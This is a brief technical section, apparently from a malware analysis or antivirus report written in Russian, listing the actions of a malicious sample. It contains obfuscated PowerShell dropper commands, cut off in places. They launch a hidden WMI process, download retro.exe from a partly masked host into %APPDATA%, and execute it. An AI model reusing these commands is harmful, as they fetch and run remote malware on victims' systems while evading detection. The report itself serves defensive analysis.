Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Computer = '.';$c = [WMICLASS]"""\\$computer\root\cimv2:WIn32_Process""";$f =[WMICLASS]"""\\$computer\root\cimv2:Win32_ProcessStartup""";$ty =$f.CreateInstance();$ty.ShowWindow = 0;$proc = $c....
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://cy###ink.com/retro.exe'',''%APPDATA%''+''\soft.exe'')'|IEX; start-process('%APPDATA%' +'\soft.ex...
- DNS ASK cy###ink.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://cy###ink.com/retro.exe'',''%APPDATA%''+''\soft.exe'')'|IEX; start-process('%APPDATA%' +'\soft.ex...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /min powershell $Computer = '.';$c = [WMICLASS]"""\\$computer\root\cimv2:WIn32_Process""";$f =[WMICLASS]"""\\$computer\root\cimv2:Win32_ProcessStartup""";$ty =$f.CreateInstance();$ty.S...